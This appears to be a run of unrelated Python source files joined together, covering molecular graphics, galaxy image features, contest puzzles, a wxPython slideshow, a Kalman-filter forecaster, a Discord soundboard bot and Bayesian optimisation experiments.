IdleLoop() Return() # Function_30_6891 end SaveToFile() Try(main)
from pymol.cgo import * from pymol import cmd CRO_balls = [COLOR, 0.000, 1.000, 1.000, SPHERE, 24.077, 27.513, 36.610, 1.600, SPHERE, 25.011, 26.478, 37.078, 1.800, SPHERE, 25.931, 26.035, 35.930, 1.800, SPHERE, 25.155, 25.422, 34.796, 1.800, SPHERE, 26.679, 27.129, 35.461, 1.500, SPHERE, 25.730, 27.106, 38.245, 1.800, SPHERE, 26.975, 27.732, 38.216, 1.600, SPHERE, 25.274, 27.124, 39.509, 1.600, SPHERE, 26.043, 27.875, 40.370, 1.800, SPHERE, 26.022, 27.962, 41.566, 1.500, SPHERE, 27.197, 28.245, 39.512, 1.800, SPHERE, 23.919, 26.721, 39.842, 1.800, SPHERE, 23.745, 25.326, 40.360, 1.800, SPHERE, 22.885, 25.116, 41.193, 1.500, SPHERE, 28.329, 28.822, 39.960, 1.800, SPHERE, 29.437, 29.370, 39.124, 1.800, SPHERE, 29.541, 29.103, 37.742, 1.800, SPHERE, 30.487, 30.110, 39.805, 1.800, SPHERE, 30.707, 29.546, 37.033, 1.800, SPHERE, 31.614, 30.563, 39.085, 1.800, SPHERE, 31.718, 30.300, 37.721, 1.800, SPHERE, 32.894, 30.804, 36.971, 1.500, ] cmd.load_cgo(CRO_balls, 'CRO_balls') cmd.set('two_sided_lighting', 'on')
import load_data import pysex import numpy as np import multiprocessing as mp import cPickle as pickle """ Extract a bunch of extra info to get a better idea of the size of objects """ SUBSETS = ['train', 'test'] TARGET_PATTERN = "data/pysex_params_gen2_%s.npy.gz" SIGMA2 = 5000 # 5000 # std of the centrality weighting (Gaussian) DETECT_THRESH = 2.0 # 10.0 # detection threshold for sextractor NUM_PROCESSES = 8 def estimate_params(img): img_green = img[..., 1] # supposedly using the green channel is a good idea. alternatively we could use luma. # this seems to work well enough. out = pysex.run(img_green, params=[ 'X_IMAGE', 'Y_IMAGE', # barycenter # 'XMIN_IMAGE', 'XMAX_IMAGE', 'YMIN_IMAGE', 'YMAX_IMAGE', # enclosing rectangle # 'XPEAK_IMAGE', 'YPEAK_IMAGE', # location of maximal intensity 'A_IMAGE', 'B_IMAGE', 'THETA_IMAGE', # ellipse parameters 'PETRO_RADIUS', # 'KRON_RADIUS', 'PETRO_RADIUS', 'FLUX_RADIUS', 'FWHM_IMAGE', # various radii ], conf_args={ 'DETECT_THRESH': DETECT_THRESH }) # x and y are flipped for some reason. # theta should be 90 - theta. # we convert these here so we can plot stuff with matplotlib easily. try: ys = out['X_IMAGE'].tonumpy() xs = out['Y_IMAGE'].tonumpy() as_ = out['A_IMAGE'].tonumpy() bs = out['B_IMAGE'].tonumpy() thetas = 90 - out['THETA_IMAGE'].tonumpy() # kron_radii = out['KRON_RADIUS'].tonumpy() petro_radii = out['PETRO_RADIUS'].tonumpy() # flux_radii = out['FLUX_RADIUS'].tonumpy() # fwhms = out['FWHM_IMAGE'].tonumpy() # detect the most salient galaxy # take in account size and centrality surface_areas = np.pi * (as_ * bs) centralities = np.exp(-((xs - 211.5)**2 + (ys - 211.5)**2)/SIGMA2) # 211.5, 211.5 is the center of the image # salience is proportional to surface area, with a gaussian prior on the distance to the center. saliences = surface_areas * centralities most_salient_idx = np.argmax(saliences) x = xs[most_salient_idx] y = ys[most_salient_idx] a = as_[most_salient_idx] b = bs[most_salient_idx] theta = thetas[most_salient_idx] # kron_radius = kron_radii[most_salient_idx] petro_radius = petro_radii[most_salient_idx] # flux_radius = flux_radii[most_salient_idx] # fwhm = fwhms[most_salient_idx] except TypeError: # sometimes these are empty (no objects found), use defaults in that case x = 211.5 y = 211.5 a = np.nan # dunno what this has to be, deal with it later b = np.nan # same theta = np.nan # same # kron_radius = np.nan petro_radius = np.nan # flux_radius = np.nan # fwhm = np.nan # return (x, y, a, b, theta, flux_radius, kron_radius, petro_radius, fwhm) return (x, y, a, b, theta, petro_radius) for subset in SUBSETS: print "SUBSET: %s" % subset print if subset == 'train': num_images = load_data.num_train ids = load_data.train_ids elif subset == 'test': num_images = load_data.num_test ids = load_data.test_ids def process(k): print "image %d/%d (%s)" % (k + 1, num_images, subset) img_id = ids[k] img = load_data.load_image(img_id, from_ram=True, subset=subset) return estimate_params(img) pool = mp.Pool(NUM_PROCESSES) estimated_params = pool.map(process, xrange(num_images), chunksize=100) pool.close() pool.join() # estimated_params = map(process, xrange(num_images)) # no mp for debugging params_array = np.array(estimated_params) target_path = TARGET_PATTERN % subset print "Saving to %s..." % target_path load_data.save_gz(target_path, params_array)
import fileinput # Kattis Erase Securely # https://open.kattis.com/problems/erase file = fileinput.input() # defaults to sys.stdin iterations = int(file.readline()) before = file.readline().strip() after = file.readline().strip() copy = "" # comparison string d = {'0': '1', '1': '0'} # dict used to map 0 to 1, and 1 to 0 if iterations % 2 == 1: # odd number of iterations, flip once for same effect copy = "".join([d.get(char) for char in before]) # get key else: # or not at all copy = before if copy == after: print("Deletion succeeded") else: print("Deletion failed")
from math import sqrt # Questions 2 def is_prime_number(x): return (x > 1) and all(x % i for i in range(2, int(sqrt(x)) + 1)) def isSideDigitsEqual(n): sn = str(n) sum1 = sum2 = 0 for i in range(int(len(sn)/2)): sum1 += int(sn[i]) sum2 += int(sn[-i-1]) if sum1 == sum2: return True return False n = 100000 while True: n += 1 if is_prime_number(n) and isSideDigitsEqual(n): print(n) break # Question 3 def sTrim(s): for c in ",.:;?!": s = s.replace(c, "") return s def getWords(fName): words = set() with open(fName) as file: for line in file: for w in filter(None, [sTrim(wd.lower()) for wd in line.split()]): # convert to lower case and remove non-word characters and remove null or empty strings from the list using filter if w[0] == "e" or w[0] == "y": words.add(w) return words words1 = getWords("D:\\Work\\Repositories\\programmingContest\\hamlet.txt") words2 = getWords("D:\\Work\\Repositories\\programmingContest\\romeoAndJuliet.txt") print(len(words1.intersection(words2)))
import wx class SlideshowFrame(wx.Frame): def __init__(self,**kwargs): wx.Frame.__init__(self, **kwargs) self.SetBackgroundColour(wx.BLACK) self.panel = wx.Panel(self, pos=self.Rect.GetPosition(), size=self.Rect.GetSize()) self.empty_img = wx.EmptyImage(self.Rect.GetWidth(), self.Rect.GetHeight()) self.imageCtrl = wx.StaticBitmap(self.panel, wx.ID_ANY, wx.BitmapFromImage(self.empty_img)) #self.verSizer = wx.BoxSizer(wx.VERTICAL) #self.horSizer = wx.BoxSizer(wx.HORIZONTAL) #self.mainSizer.Add(self.imageCtrl, 0, wx.ALL|wx.ALIGN_CENTER, 0) #self.panel.SetSizer(self.mainSizer) #self.mainSizer.Fit(self) #self.panel.Layout() def load_img(self, img_path): if img_path is None: img = self.empty_img else: img = wx.Image(img_path, wx.BITMAP_TYPE_ANY) # # scale the image, preserving the aspect ratio # w = img.GetWidth() h = img.GetHeight() W = self.Rect.GetWidth() H = self.Rect.GetHeight() # scale w to match W, and see if height is over/under H. If so, scale # h to match H instead. w2, h2 = W, h*(float(W)/w) if h2 > H: w2, h2 = w*(float(H)/h), H img = img.Scale(w2,h2,quality=wx.IMAGE_QUALITY_HIGH) self.imageCtrl.SetBitmap(wx.BitmapFromImage(img)) #self.panel.Layout() O = self.Rect.GetPosition() # frame origin X,Y = (O[0] + (W-w2)/2, O[1] + (H-h2)/2) self.panel.SetRect((X,Y,w2,h2)) #self.mainSizer.Fit(self) #self.panel.Layout() self.panel.Refresh()
import numpy as np from scipy.optimize import minimize import time import os import json from models.forecast_model import ForecastModel from distributions.log_normal import LogNormal import utils class KalmanFilter(ForecastModel, LogNormal): """ Implements the probabilistic forecasting model based on double-seasonal HWT Exponential Smoothing (Taylor, 2010) that estimates parameters and creates forecasts in closed form using the linear Kalman Filter (Särkkä, 2013). """ def __init__(self, y, t, u=None, ID='', exp_smooth_fit=False, num_filter_weeks=52): super().__init__(y, t, u, ID) self.dim = 2 + self.s_d + self.s_w if u is not None: self.dim += u.shape[1] # Default parameters [alpha, delta, omega, phi, nu2] self.theta = np.array([0.01, 0.15, 0.15, 0.90, 1e-3]) self.exp_smooth_fit = exp_smooth_fit self.filter_range = min(len(t), num_filter_weeks * self.s_w) # Process noise covariance matrix self.Q_idx = tuple(np.meshgrid( np.array([0, 1, 2, 2 + self.s_d]), np.array([0, 1, 2, 2 + self.s_d]), indexing='ij' )) self.Q = lambda theta: theta[4] * np.outer( np.array([1, theta[0], theta[1], theta[2]]), np.array([1, theta[0], theta[1], theta[2]]) ) self.q = lambda theta: np.hstack([ 1, theta[0], theta[1], np.zeros(self.s_d - 1), theta[2], np.zeros(self.dim - self.s_d - 3) ]) # Measurement noise self.r = lambda theta: 0 # Predicted measurement mean and variance self.mu_y = np.zeros(0) self.sigma2_y = np.zeros(0) # self.results[0]['mu_y'] = [] # self.results[0]['sigma2_y'] = [] # Mean and Variance of the prior state distribution self.m = self.initialize_mean(y, u) self.P = 1e-3 * np.eye(self.dim) # Negative Log Maximum Likelihood Estimate self.mle = 0 self.cnt = 0 params_path = os.path.join(self.get_out_dir(), self.results[0]["ID"] + '.json') if os.path.exists(params_path): with open(params_path, 'r') as fp: res = json.load(fp) self.theta = np.array(res['params']) self.results[0]['params'] = self.theta.tolist() _, _, self.m, self.P, self.mle = self.filter( self.theta, t[-self.filter_range:], u[-self.filter_range:] if u is not None else None, y[-self.filter_range:] ) def __str__(self): return 'KalmanFilter' def fA(self, X, theta, transpose=False): """ Computes the matrix-matrix (AX) or matrix-vector (Ax) multiplication of A and X efficiently. This is possible since A is a sparse matrix. If transpose=True XA^T is computed. """ # Transition matrix res = np.empty_like(X) if X.ndim == 1: res[3:] = X[2:self.dim - 1] res[0] = theta[3] * X[0] res[1] = theta[0] * theta[3] * X[0] + X[1] res[2] = theta[1] * theta[3] * X[0] + X[1 + self.s_d] res[2 + self.s_d] = theta[2] * theta[3] * X[0] + X[1 + self.s_d + self.s_w] if self.u is not None: res[2 + self.s_d + self.s_w:] = X[2 + self.s_d + self.s_w:] elif not transpose: res[3:, :] = X[2:self.dim - 1, :] res[0, :] = theta[3] * X[0, :] res[1, :] = theta[0] * theta[3] * X[0, :] + X[1, :] res[2, :] = theta[1] * theta[3] * X[0, :] + X[1 + self.s_d, :] res[2 + self.s_d, :] = theta[2] * theta[3] * X[0, :] + X[1 + self.s_d + self.s_w, :] if self.u is not None: res[2 + self.s_d + self.s_w:, :] = X[2 + self.s_d + self.s_w:, :] else: res[:, 3:] = X[:, 2:self.dim - 1] res[:, 0] = theta[3] * X[:, 0] res[:, 1] = theta[0] * theta[3] * X[:, 0] + X[:, 1] res[:, 2] = theta[1] * theta[3] * X[:, 0] + X[:, 1 + self.s_d] res[:, 2 + self.s_d] = theta[2] * theta[3] * X[:, 0] + X[:, 1 + self.s_d + self.s_w] if self.u is not None: res[:, 2 + self.s_d + self.s_w:] = X[:, 2 + self.s_d + self.s_w:] return res def fh(self, X, theta, u=None): """ Computes the matrix-vector multiplication (Xh) or the inner product (h^T * x) efficiently. """ # Measurement model matrix if X.ndim == 1: res = (1 - theta[0] - theta[1] - theta[2]) * X[0] + X[1] + X[2] + X[2 + self.s_d] if u is not None: res += np.inner(X[2 + self.s_d + self.s_w:], u) else: res = (1 - theta[0] - theta[1] - theta[2]) * X[:, 0] + X[:, 1] + X[:, 2] + X[:, 2 + self.s_d] if u is not None: res += X[:, 2 + self.s_d + self.s_w:] @ u return res def initialize_mean(self, y, u=None): """ Initializes the level, daily, weekly and weather component of the mean vector. """ # Use first 3 weeks of data for initialization y_init = np.log(y[:3 * self.s_w]) # Initialize the residual and the smoothed level e0 = 0 l0 = np.nanmean(y_init) # Initialize the seasonal index for the intraday cycle d0 = np.nanmean(y_init.reshape(-1, self.s_d), axis=0) - l0 # Initialize the seasonal index for the intraweek cycle w0 = np.nanmean(y_init.reshape(-1, self.s_w), axis=0) - np.tile(d0, int(self.s_w / self.s_d)) - l0 # Initialize the weather regression coefficients if u is not None: b0 = -0.01 * np.log(self.y_mean) * np.ones(u.shape[1]) else: b0 = np.zeros(0) return np.hstack((e0, l0, np.flip(d0), np.flip(w0), b0)) def filter(self, theta, t, u=None, y=None, timer=False): """ Implements the Kalman Filter prediction and update steps for the timestamps t. Additionally, the marginal likelihood estimate (MLE) for the parameters theta is computed in the filter recursion. The function returns the distribution parameter estimates mu_y and sigma^2_y for the timestamps t, the state vector m and covariance matrix P from the last iteration and the MLE. """ start_time = time.time() # Initialize mu_y = np.zeros(len(t)) sigma2_y = np.zeros(len(t)) m = self.m P = self.P mle = self.mle # Rescale u if u is not None: u = utils.standardize(u, self.u_mean, self.u_std) A = lambda x: self.fA(x, theta) A_T = lambda x: self.fA(x, theta, transpose=True) Q = self.Q(theta) h = lambda x1, x2, x3: self.fh(x1, theta) if x2 is None else self.fh(x1, theta, x2[x3]) r = self.r(theta) # Kalman filter for i in range(len(t)): # Prediction step m = A(m) P = A_T(A(P)) P[self.Q_idx] += Q mu_y[i] = h(m, u, i) Ph = h(P, u, i) sigma2_y[i] = h(Ph, u, i) + r if y is not None and not np.isnan(y[i]): # Update step v = np.log(y[i]) - mu_y[i] s = max(sigma2_y[i], 1e-8) k = Ph / s m += k * v P -= sigma2_y[i] * k[:, np.newaxis] * k mle += 0.5 * np.log(2 * np.pi * s) + 0.5 * v ** 2 / s if timer: self.cnt += 1 print(f'Iteration {self.cnt}: Time = {time.time() - start_time:.4f}s, theta = {theta}') return mu_y, sigma2_y, m, P, mle def exp_smooth(self, theta, t, u=None, y=None, timer=False): """ Implements exponential smoothing for the timestamps t, which provides a fast way to estimate the parameters theta via MLE. However, the Kalman Filter provides better parameter estimates. """ start_time = time.time() # Initialize y_hat = np.zeros(len(t)) m = self.m # Rescale u if u is not None: u = utils.standardize(u, self.u_mean, self.u_std) A = lambda x: self.fA(x, theta) q = self.q(theta) h = lambda x1, x2, x3: self.fh(x1, theta) if x2 is None else self.fh(x1, theta, x2[x3]) # Exponential Smoothing for i in range(len(t)): # Prediction step m = A(m) y_hat[i] = h(m, u, i) if y is not None and not np.isnan(y[i]): # Update step v = np.log(y[i]) - y_hat[i] m += q * v err = (np.log(y) - y_hat) ** 2 mle = len(t) * np.log(np.nansum(err)) eps = np.nanmean(err) if timer: self.cnt += 1 print(f'Iteration {self.cnt}: Time = {time.time() - start_time:.4f}s, theta = {theta}') return mle, eps def fit(self): """ Fits the parameters of the Kalman Filter model by minimizing the Gaussian negative log likelihood with the non-linear optimizer L-BFGS-B. """ super().fit() start_time = time.time() # Initialize self.m = self.initialize_mean(self.y, self.u) self.P = 1e-3 * np.eye(self.dim) self.mle = 0 if self.exp_smooth_fit: res = minimize( fun=lambda theta: self.exp_smooth(theta, self.t, self.u, self.y, timer=True)[0], x0=self.theta[:-1], method='L-BFGS-B', bounds=[(0, 1), (0, 1), (0, 1), (0, 1)], ) self.theta[:-1] = res.x self.theta[-1] = self.exp_smooth(res.x, self.t, self.u, self.y)[1] else: res = minimize( fun=lambda theta: self.filter( theta, self.t[-self.filter_range:], self.u[-self.filter_range:] if self.u is not None else None, self.y[-self.filter_range:], timer=True )[-1], x0=self.theta, method='L-BFGS-B', bounds=[(0, 1), (0, 1), (0, 1), (0, 1), (1e-6, 1)], options={'ftol': 1e-6} ) self.theta = res.x self.results[0]['params'] = self.theta.tolist() print(f'{self.results[0]["ID"]} minimizer: {self.theta}') _, _, self.m, self.P, self.mle = self.filter( self.theta, self.t[-self.filter_range:], self.u[-self.filter_range:] if self.u is not None else None, self.y[-self.filter_range:] ) self.results[0]['fit_time'] = time.time() - start_time def add_measurements(self, y, t, u=None): """ Updates the state of the Kalman Filter after measurements are added. """ super().add_measurements(y, t, u) _, _, self.m, self.P, self.mle = self.filter(self.theta, t, u, y) def predict(self, t, u=None): """ Predicts the forecast distribution parameters for the timestamps t, optionally given covariates u. """ if super().predict(t, u): return start_time = time.time() mu_y, sigma2_y, _, _, _ = self.filter(self.theta, t, u) self.mu_y = np.hstack([self.mu_y, mu_y]) self.sigma2_y = np.hstack([self.sigma2_y, sigma2_y]) # self.results[0]['mu_y'].append(mu_y.tolist()) # self.results[0]['sigma2_y'].append(sigma2_y.tolist()) self.results[0]['prediction_time'].append(time.time() - start_time) def get_mean(self, t): super().get_mean(t) idx = self.idx(t) return self.mean(self.mu_y[idx], self.sigma2_y[idx]) def get_var(self, t): super().get_var(t) idx = self.idx(t) return self.var(self.mu_y[idx], self.sigma2_y[idx]) def get_percentile(self, p, t): super().get_percentile(p, t) idx = self.idx(t) return self.percentile(p, self.mu_y[idx], self.sigma2_y[idx]) def get_pit(self, y_true, t): super().get_pit(y_true, t) idx = self.idx(t) return self.cdf(y_true, self.mu_y[idx], self.sigma2_y[idx]) def get_crps(self, y_true, t): super().get_crps(y_true, t) idx = self.idx(t) return self.crps(y_true, self.mu_y[idx], self.sigma2_y[idx])
import os import glob from datetime import datetime, timedelta import discord from discord.ext import commands import asyncio import json import aiosqlite from pydub import AudioSegment from token_discord import BOT_TOKEN import bot_config FILE_DIR = bot_config.FILE_DIR SOUND_PLAYER_DIR = bot_config.SOUND_PLAYER_DIR COMMAND_PREFIX = bot_config.COMMAND_PREFIX DEFAULT_BAN_DURATION = bot_config.DEFAULT_BAN_DURATION ERRORS = bot_config.SEND_ERROR_MESSAGES SWITCH = bot_config.ALLOW_SWITCH_CHANNELS ADMIN_ROLES = bot_config.ADMIN_ROLES client = discord.Client() #change the prefix for chatcommands, default = '.' bot = commands.Bot(command_prefix=COMMAND_PREFIX) #makes the bot join your voice channel, plays the sound and stays in channel @bot.command( help="Takes a soundname as a required argument and play count as an optional argument.\n\ Joins your voice channel(if not already connected) and plays the requested sound\n\ Use: .play (sound name) [play count]", brief="Play a sound" ) async def play(ctx, soundName : str, playCount=1): """ Joins the voice channel and plays the specified sound the specified number of times ctx: the context taken from the command in discord(automatically generated) soundName: the name of the sound to be played playCount : the number of times to play the sound(optional) returns : None """ if playCount > bot_config.MAX_PLAYCOUNT or await isBanned(ctx.guild.id, ctx.author.id): return await play_func(ctx, soundName, playCount = playCount) @bot.command( help="Stops the sound that is currently playing", brief="Stops the sound that is currently playing" ) async def stop(ctx): voiceClient = ctx.guild.voice_client if await isBanned(ctx.guild.id, ctx.author.id): if ERRORS: await ctx.send("Cannot use stop command because you are banned") return if not voiceClient: if ERRORS: await ctx.send('```Not connected to voice or you\'re not in the right channel```') return voiceClient.stop() @bot.command( help="Instantly makes the bot leave the channel you're currently in, stopping any sound that is being played", brief="Make the bot leave the voice channel" ) async def leave(ctx): voiceClient = ctx.guild.voice_client if await isBanned(ctx.guild.id, ctx.author.id): if ERRORS: await ctx.send("Cannot use leave command because you are banned") return if not voiceClient: if ERRORS: await ctx.send('```Not connected to voice or you\'re not in the right channel```') return await voiceClient.disconnect() # send a message with the list of available sounds to the channel @bot.command( help="Posts a list of all available sounds to the channel", brief="Posts a list of all available sounds to the channel" ) async def list(ctx): sound_list = await soundList() if 'output' in sound_list: sound_list.remove('output') ret_string = '```List of Sounds:\n\n'+ '\n'.join(sound_list)+'```' await ctx.send(ret_string) @bot.command( help=f"Bans a member of the guild of the text channel the command is sent to.\ Takes the name of the user to be banned as a required argument, the duration(in days, accepts fractional days like 0.5) and the reason\ as optional arguments.\nIf you want to add a reason you must also add the duration. The default ban time is set to {DEFAULT_BAN_DURATION} days\ Banned users can still continue as normal on the server but they cannot use the bot's play and leave commands\n\ Only admins and users with the correct role can use this command.\n\ For optimal results add the discriminator(the #1234 part) of the user to ban to avoid banning innocent users with the same name.\n\ Use: .ban (username) [duration] [reason]", brief="Bans a user from using the bots core features" ) async def ban(ctx, user_to_ban_name: str, ban_time=DEFAULT_BAN_DURATION, reason="Unspecified"): if not await has_admin_rights(ctx): if ERRORS: await ctx.send("```You are not authorised to ban people. Only the admin and selected members can perform this action.```") return user_id = await get_id_from_name(ctx, user_to_ban_name) if user_id is None: return guild_id = ctx.guild.id unban_time = await calc_time_after_timedelta(ban_time) if await isBanned(guild_id, user_id): if ERRORS: await ctx.send(f"```{user_to_ban_name} is already banned```") return async with aiosqlite.connect('banned.db') as db: await db.execute("INSERT INTO banned_users VALUES (?,?,?,?)", (user_id, guild_id, unban_time, reason)) await db.commit() await ctx.send(f"```User {user_to_ban_name} banned for {ban_time} days.```") @bot.command( help="Unbans a member of the guild of the text channel the command is sent to.\n\ Takes the name of the user to be unbanned as a required argument.\n\ Only admins and users with the correct role can use this command.\n\ For optimal results add the discriminator(the #1234 part) of the user to ban to avoid banning innocent users with the same name.\n\ Use: .unban (username)", brief="Unbans the specified user allowing them to use the bot again" ) async def unban(ctx, user_to_unban_name: str): if not await has_admin_rights(ctx): if ERRORS: await ctx.send("```You are not authorised to unban people. Only the admin and selected members can perform this action.```") return guild_id = ctx.guild.id user_id = await get_id_from_name(ctx, user_to_unban_name) if user_id is None: if ERRORS: await ctx.send(f"```Could not find user {user_to_unban_name}. This command is case sensitive and the name must match exactly.```") return if not await isBanned(guild_id, user_id): if ERRORS: await ctx.send(f"```{user_to_unban_name} is not banned. This command is case sensitive and the name must match exactly.```") return async with aiosqlite.connect('banned.db') as db: del_query = "DELETE FROM banned_users WHERE guild_id = ? AND user_id = ?" await db.execute(del_query, (guild_id, user_id)) await db.commit() await ctx.send(f"```{user_to_unban_name} has been unbanned```") # get the ban status of a user (named) @bot.command( help="Checks the status of the ban of the specified user\n\ Shows the remaining time of the ban and the reason for the ban\n\ Use: .banStatus (username)", brief="Check the ban status of a user" ) async def banStatus(ctx, user_name: str): user_id = await get_id_from_name(ctx, user_name) if not user_id: if ERRORS: await ctx.send(f"```Could not find user {user_name}. This command is case sensitive and the name must match exactly.```") return if not await isBanned(ctx.guild.id, user_id): await ctx.send("```Status:\nNot Banned```") return else: async with aiosqlite.connect('banned.db') as db: query = "SELECT * FROM banned_users WHERE guild_id = ? AND user_id = ?" cursor = await db.execute(query, (ctx.guild.id, user_id)) user_info = await cursor.fetchone() unban_time, reason = user_info[2:] t = unban_time - int(datetime.now().timestamp()) td = timedelta(seconds=t) days = td.days seconds = td.seconds hours, minutes, seconds = await convert_seconds(seconds) time_string = f"{days} days {hours} hours {minutes} minutes {seconds} seconds" await ctx.send(f"```Status:\nBanned\n\nTime until unban:\n{time_string}\n\nReason:\n{reason}```") async def has_admin_rights(ctx): isAdmin = ctx.author == ctx.guild.owner hasRole = any(role.name.lower() in [admin_role.lower() for admin_role in ADMIN_ROLES] for role in ctx.author.roles) return isAdmin or hasRole # gets the list of all the mp3 files in the file directory # Sounds folder needs to exist, otherwise this crashes async def soundList(): try: soundList = glob.glob(FILE_DIR + '/*.mp3') except: soundList = [] adjustedNamesList = [sound[len(FILE_DIR) + 1:-4] for sound in soundList] return adjustedNamesList async def get_id_from_name(ctx, name: str): member_object = ctx.guild.get_member_named(name) if not member_object: if ERRORS: await ctx.send(f"```User {name} was not found. This command is case sensitive and the name must match exactly```") return None return member_object.id async def calc_time_after_timedelta(days): td = timedelta(days=days) now = datetime.now() datetime_after_timedelta = now + td return int(datetime_after_timedelta.timestamp()) async def convert_seconds(seconds): hours = seconds // 3600 seconds %= 3600 minutes = seconds // 60 seconds %= 60 return (hours, minutes, seconds) async def isBanned(guild_id, user_id): async with aiosqlite.connect('banned.db') as db: query = "SELECT unban_time FROM banned_users WHERE guild_id = ? AND user_id = ?" async with db.execute(query, (guild_id, user_id)) as cursor: result = await cursor.fetchone() if not result: return False # ban has expired elif datetime.now().timestamp() >= result[0]: query = "DELETE FROM banned_users WHERE guild_id = ? AND user_id = ?" await db.execute(query, (guild_id, user_id)) await db.commit() return False else: return True async def getVoiceClient(ctx): user_voice = ctx.author.voice bot_voice = ctx.guild.voice_client # user is in voice channel if user_voice: # there is no established connection to voice channel for the bot if not bot_voice: voice_client = await user_voice.channel.connect() # bot and user are not connected to the same voice channel elif user_voice.channel.id != bot_voice.channel.id: # if the bot is set to switch channels when needed if SWITCH: await bot_voice.disconnect() voice_client = await user_voice.channel.connect() # bot is not allowed to switch and we should return None to indicate we cannot connect else: voice_client = None # the bot is connected to the same channel as the user else: voice_client = bot_voice else: voice_client = None return voice_client async def play_func(ctx, soundName: str, playCount = 1): """ Joins the voice channel and plays the specified sound the specified number of times ctx: the context taken from the command in discord(automatically generated) soundName: the name of the sound to be played playCount : the number of times to play the sound(optional) returns : None """ playCount = int(playCount) if playCount > bot_config.MAX_PLAYCOUNT: if ERRORS: await ctx.send(f"```Please do not spam. The maximum amount of plays is set to {bot_config.MAX_PLAYCOUNT}```") SoundList = await soundList() if soundName not in SoundList: if ERRORS: await ctx.send(f'```Couldn\'t find a sound named {soundName} in your \'Sounds\'-folder```') return # get voiceclient before writing to file to check if bot is already playing from file # otherwise we can't queue sounds because we'd have to allow allow writing to files being played voiceClient = await getVoiceClient(ctx) if not voiceClient: err_msg = '```Error, you might not be connected to a voice channel or you are in a different channel and the bot is set to not switch```' if ERRORS: await ctx.send(err_msg) return # wait while bot is playing another sound # allows for queuing of sounds while voiceClient.is_playing(): await asyncio.sleep(0.1) soundName = FILE_DIR + "/" + soundName + '.mp3' # pydub audio manipulation to repeat sound multiple times sound = AudioSegment.from_mp3(soundName) multiplied_sound = sound * playCount multiplied_sound.export(FILE_DIR + "/output.mp3", format="mp3") #create a new playable audiosource from the soundfile audioSource = discord.FFmpegPCMAudio( FILE_DIR+"/output.mp3", executable = SOUND_PLAYER_DIR ) #get the voiceClient voiceClient.play(audioSource) return None @bot.command() async def roles(ctx): await ctx.send(ctx.author.roles) async def init_db(): db = await aiosqlite.connect('banned.db') await db.execute('CREATE TABLE IF NOT EXISTS banned_users (user_id, guild_id, unban_time, reason)') await db.commit() return AudioSegment.ffmpeg = SOUND_PLAYER_DIR asyncio.run(init_db()) bot.run(BOT_TOKEN)
import sys sys.path.insert(0,'..') sys.path.insert(0,'../..') from bayes_opt import BayesOpt,BayesOpt_KnownOptimumValue import numpy as np #from bayes_opt import auxiliary_functions from bayes_opt import functions from bayes_opt import utilities import warnings #from bayes_opt import acquisition_maximization import sys import itertools import matplotlib.pyplot as plt np.random.seed(6789) warnings.filterwarnings("ignore") counter = 0 myfunction_list=[] #myfunction_list.append(functions.sincos()) #myfunction_list.append(functions.branin()) #myfunction_list.append(functions.hartman_3d()) #myfunction_list.append(functions.ackley(input_dim=5)) myfunction_list.append(functions.alpine1(input_dim=5)) #myfunction_list.append(functions.hartman_6d()) #myfunction_list.append(functions.gSobol(a=np.array([1,1,1,1,1]))) #myfunction_list.append(functions.gSobol(a=np.array([1,1,1,1,1,1,1,1,1,1]))) acq_type_list=[] temp={} temp['name']='erm' # expected regret minimization temp['IsTGP']=0 # recommended to use tgp for ERM acq_type_list.append(temp) temp={} temp['name']='cbm' # confidence bound minimization temp['IsTGP']=1 # recommended to use tgp for CBM #acq_type_list.append(temp) #temp={} #temp['name']='kov_mes' # MES+f* #temp['IsTGP']=0 # we can try 'tgp' #acq_type_list.append(temp) temp={} temp['name']='kov_ei' # this is EI + f* temp['IsTGP']=0 # we can try 'tgp' by setting it =1 #acq_type_list.append(temp) temp={} temp['name']='ucb' # vanilla UCB temp['IsTGP']=0 # we can try 'tgp' by setting it =1 #acq_type_list.append(temp) temp={} temp['name']='ei' # vanilla EI temp['IsTGP']=0 # we can try 'tgp' by setting it =1 #acq_type_list.append(temp) temp={} temp['name']='random' # vanilla EI temp['IsTGP']=0 # we can try 'tgp' by setting it =1 #acq_type_list.append(temp) fig=plt.figure() color_list=['r','b','k','m','c','g','o'] marker_list=['s','x','o','v','^','>','<'] for idx, (myfunction,acq_type,) in enumerate(itertools.product(myfunction_list,acq_type_list)): print("=====================func:",myfunction.name) print("==================acquisition type",acq_type) IsTGP=acq_type['IsTGP'] acq_name=acq_type['name'] nRepeat=10 ybest=[0]*nRepeat MyTime=[0]*nRepeat MyOptTime=[0]*nRepeat marker=[0]*nRepeat bo=[0]*nRepeat [0]*nRepeat for ii in range(nRepeat): if 'kov' in acq_name or acq_name == 'erm' or acq_name == 'cbm': bo[ii]=BayesOpt_KnownOptimumValue(myfunction.func,myfunction.bounds,myfunction.fstar, \ acq_name,IsTGP,verbose=1) else: bo[ii]=BayesOpt(myfunction.func,myfunction.bounds,acq_name,verbose=1) ybest[ii],MyTime[ii]=utilities.run_experiment(bo[ii],n_init=3*myfunction.input_dim,\ NN=10*myfunction.input_dim,runid=ii) MyOptTime[ii]=bo[ii].time_opt print("ii={} BFV={:.3f}".format(ii,myfunction.ismax*np.max(ybest[ii]))) Score={} Score["ybest"]=ybest Score["MyTime"]=MyTime Score["MyOptTime"]=MyOptTime utilities.print_result_sequential(bo,myfunction,Score,acq_type) ## plot the result # process the result y_best_sofar=[0]*len(bo) for uu,mybo in enumerate(bo): y_best_sofar[uu]=[ (myfunction.fstar - np.max(mybo.Y_ori[:ii+1]) ) for ii in range(len(mybo.Y_ori))] y_best_sofar[uu]=y_best_sofar[uu][3*myfunction.input_dim:] # remove the random phase for plotting purpose y_best_sofar=np.asarray(y_best_sofar) myxaxis=range(y_best_sofar.shape[1]) plt.errorbar(myxaxis,np.mean(y_best_sofar,axis=0), np.std(y_best_sofar,axis=0)/np.sqrt(nRepeat), label=acq_type['name'],color=color_list[idx],marker=marker_list[idx]) plt.ylabel("Simple Regret",fontsize=14) plt.xlabel("Iterations",fontsize=14) plt.legend(prop={'size': 14}) strTitle="{:s} D={:d}".format(myfunction.name,myfunction.input_dim) plt.title(strTitle,fontsize=18)
